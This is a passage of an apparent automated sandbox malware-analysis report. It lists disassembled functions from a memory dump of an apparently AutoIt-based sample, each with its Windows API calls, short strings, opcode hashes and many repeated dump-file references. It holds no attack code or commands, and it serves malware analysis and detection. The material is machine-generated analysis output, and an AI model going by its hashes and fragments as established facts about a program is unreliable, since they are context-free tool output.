                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                  • String ID: static
                                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                                  • Opcode ID: 87ce8d5581bfcd0e470fc3ac85c6a04c47cbc0c32fcf9ac8af24db8879150bf0
                                                                                                                                  • Instruction ID: 720189ab205f651bb1b2bbec1deebf49c4902b218452153f3197e5ac743af742
                                                                                                                                  • Opcode Fuzzy Hash: 87ce8d5581bfcd0e470fc3ac85c6a04c47cbc0c32fcf9ac8af24db8879150bf0
                                                                                                                                  • Instruction Fuzzy Hash: 2A115972520209AFDB04DFB8CC46EEA7BA8FB08314F000528F955E3181E674E851EB50
                                                                                                                                  Function 00F09424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00F094A6
                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F094B5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                                  • String ID: edit
                                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                                  • Opcode ID: 86d91f238fbf76ea16285f63bd51a9f06d0514cb761995b7cb7738dac55036a8
                                                                                                                                  • Instruction ID: 830512161bb52bc90bc3b513a4e2fb528e0bdf4d6c95bc10d61682e3d3ac5e8a
                                                                                                                                  • Opcode Fuzzy Hash: 86d91f238fbf76ea16285f63bd51a9f06d0514cb761995b7cb7738dac55036a8
                                                                                                                                  • Instruction Fuzzy Hash: 8C118F75508208AFEF108E64DC81EEB3B69EB05374F608724F965931E2D7B5DC52BB60
                                                                                                                                  Function 00EE5C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00EE5CF3
                                                                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00EE5D12
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                  • Opcode ID: 0e4c58952c7797e6c1ab872f584377a52893b2f502a12b242a22bcc2bd5e43aa
                                                                                                                                  • Instruction ID: 488f5c6a54d4551b9f1661829f41840316927a92dbcf0cee1003e121162768c4
                                                                                                                                  • Opcode Fuzzy Hash: 0e4c58952c7797e6c1ab872f584377a52893b2f502a12b242a22bcc2bd5e43aa
                                                                                                                                  • Instruction Fuzzy Hash: 8611003790169CEBCB21DB99DC08B9AB7F8AB0634CF2A1021EC01FB290D370AD01D790
                                                                                                                                  Function 00EF53F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EF544C
                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EF5475
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                                  • String ID: <local>
                                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                                  • Opcode ID: ad0f579224dd81a92e5ac14eb39f3e7afaa03e85f7147050d206504f89b2de6c
                                                                                                                                  • Instruction ID: dd0a5d7ff173f25e8be77122a04b0f8df3058e20d396e07ee8056114c12ae230
                                                                                                                                  • Opcode Fuzzy Hash: ad0f579224dd81a92e5ac14eb39f3e7afaa03e85f7147050d206504f89b2de6c
                                                                                                                                  • Instruction Fuzzy Hash: E311C672141A29BADB258F518C84EFBFB69FF22756F10922AF76666040E37059C0D6F0
                                                                                                                                  Function 00EFACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: htonsinet_addr
                                                                                                                                  • String ID: 255.255.255.255
                                                                                                                                  • API String ID: 3832099526-2422070025
                                                                                                                                  • Opcode ID: 75aa70e2825f5226b5bd0bbaa63bad48b38f439196411681ab4d01c979e097e1
                                                                                                                                  • Instruction ID: c7895dee00d59bbe2ce96acc771464377375020ef12ab2a14005f4e9eeca6d8f
                                                                                                                                  • Opcode Fuzzy Hash: 75aa70e2825f5226b5bd0bbaa63bad48b38f439196411681ab4d01c979e097e1
                                                                                                                                  • Instruction Fuzzy Hash: 7001D675200209ABCB109FA4CC46FADB3A4EF05728F14952AFA19AF2D1D672E805C756
                                                                                                                                  Function 00EDC577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EDC5E5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 1456604079-1403004172
                                                                                                                                  • Opcode ID: 09db9a7e65770564ac09e58e32c0ef7c2431cc108fed21283ed7c10933061059
                                                                                                                                  • Instruction ID: 643b27e489c64a96f56f4e4465ef651ec5e6b5750b70ccdecd312fea1f1751cd
                                                                                                                                  • Opcode Fuzzy Hash: 09db9a7e65770564ac09e58e32c0ef7c2431cc108fed21283ed7c10933061059
                                                                                                                                  • Instruction Fuzzy Hash: D1019271641119ABCB04EB64DC518FE73A9EF47350724161AF433BB3D1DA24A9099750
                                                                                                                                  Function 00EEC4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __fread_nolock_memmove
                                                                                                                                  • String ID: EA06
                                                                                                                                  • API String ID: 1988441806-3962188686
                                                                                                                                  • Opcode ID: 50aa869d041113187dbd3c7bb0ed5ddc264c4dbda1c1138ba5846efd2811d568
                                                                                                                                  • Instruction ID: 69119e71f358a74e846fdc24e1d6341d24f9ee37801148802c1e28e709338be4
                                                                                                                                  • Opcode Fuzzy Hash: 50aa869d041113187dbd3c7bb0ed5ddc264c4dbda1c1138ba5846efd2811d568
                                                                                                                                  • Instruction Fuzzy Hash: D901F5B29002586EDB28C7A8CC16FFE7BF89B05311F00415EE193E21C1E4B4E7088B60
                                                                                                                                  Function 00EDC473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00EDC4E1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 1456604079-1403004172
                                                                                                                                  • Opcode ID: 4b60f982ab1130ecee9f719b93e78622b8a905ad3687e8fe38169c9a2de63111
                                                                                                                                  • Instruction ID: cd3f0aaacacc5178ef976384fedc3b3dd25fc99db2b64389344283b92d864d94
                                                                                                                                  • Opcode Fuzzy Hash: 4b60f982ab1130ecee9f719b93e78622b8a905ad3687e8fe38169c9a2de63111
                                                                                                                                  • Instruction Fuzzy Hash: 100184726411096BC714EBA4C962AFF73E9DF06341F241116A913F72C1DA54AE0A96A1
                                                                                                                                  Function 00EDC4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00EDC562
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 1456604079-1403004172
                                                                                                                                  • Opcode ID: 48140f4406d868c0d639ff3ccc31f9aad300a0dc4adcd57f191829c811c7903f
                                                                                                                                  • Instruction ID: 9ac96e77ce317e30183b3ae1e09c1f53f1e9570a58378eeed7856a372813aae2
                                                                                                                                  • Opcode Fuzzy Hash: 48140f4406d868c0d639ff3ccc31f9aad300a0dc4adcd57f191829c811c7903f
                                                                                                                                  • Instruction Fuzzy Hash: 9601FD72A401096BCB00FBA4D902EFF73E89F06741F242116B903F72C1DA14AE0AA2A1
                                                                                                                                  Function 00EE804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassName_wcscmp
                                                                                                                                  • String ID: #32770
                                                                                                                                  • API String ID: 2292705959-463685578
                                                                                                                                  • Opcode ID: b4d2fa9b9e134a617ab290e759440e3c1522c90d5c256731e6bc32b63cd0dc97
                                                                                                                                  • Instruction ID: 08588448d880390d649e6ee99e57b44ee26abc9ab31c8803beac70dbcc16632d
                                                                                                                                  • Opcode Fuzzy Hash: b4d2fa9b9e134a617ab290e759440e3c1522c90d5c256731e6bc32b63cd0dc97
                                                                                                                                  • Instruction Fuzzy Hash: 88E0D83360022D27D720EAAADC4AF97FBACEB517A4F00002AFA24E3041DAB0D64587D0
                                                                                                                                  Function 00EDB35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00EDB36B
                                                                                                                                    • Part of subcall function 00EC2011: _doexit.LIBCMT ref: 00EC201B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message_doexit
                                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                                  • API String ID: 1993061046-4017498283
                                                                                                                                  • Opcode ID: 5bc96a298d613d068b911c763a7223d7b9d47ef23651eaa439f0e2e20d394ff1
                                                                                                                                  • Instruction ID: 8414493041b644bfe4a9e3e4576ce305b32b5929e5eb6da4ea2abc918a265fba
                                                                                                                                  • Opcode Fuzzy Hash: 5bc96a298d613d068b911c763a7223d7b9d47ef23651eaa439f0e2e20d394ff1
                                                                                                                                  • Instruction Fuzzy Hash: 7DD0123138931832D21522987D07FC9B6C88F0AB51F05101ABF48752C28AD2E4916199
                                                                                                                                  Function 00F1BC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00F1BAB8
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F1BCAB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryFreeLibrarySystem
                                                                                                                                  • String ID: WIN_XPe
                                                                                                                                  • API String ID: 510247158-3257408948
                                                                                                                                  • Opcode ID: 0ffab040fc8aba30f04e5e6358bf9df6d0e26dc43489ba6d0bd921617d18d8a7
                                                                                                                                  • Instruction ID: d5a55d4e67cb1f49b10d7521926eea1c9e3505f6f2a18a2345701a930a8bc524
                                                                                                                                  • Opcode Fuzzy Hash: 0ffab040fc8aba30f04e5e6358bf9df6d0e26dc43489ba6d0bd921617d18d8a7
                                                                                                                                  • Instruction Fuzzy Hash: 31E0ED71C0410DEFDB15DBA8CD45AEDB7B8BF08300F148496E522B2150C7755A85FF21
                                                                                                                                  Function 00F084C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F084DF
                                                                                                                                  • PostMessageW.USER32(00000000), ref: 00F084E6
                                                                                                                                    • Part of subcall function 00EE8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EE83CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                  • Opcode ID: 915261287c6f1f1aab8c5503bdf8542cdf621f33c46e6b06011893c12606b368
                                                                                                                                  • Instruction ID: df89e2f7ebf588cf18fa376cc1717c16b4d10f56cb807bb86a3cf01554d8c151
                                                                                                                                  • Opcode Fuzzy Hash: 915261287c6f1f1aab8c5503bdf8542cdf621f33c46e6b06011893c12606b368
                                                                                                                                  • Instruction Fuzzy Hash: 50D022323803087BF730A370DC0FFC37A44EB18B01F0009297309AA1C0C8E0B800C221
                                                                                                                                  Function 00F08495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F0849F
                                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F084B2
                                                                                                                                    • Part of subcall function 00EE8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EE83CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                  • API String ID: 529655941-2988720461
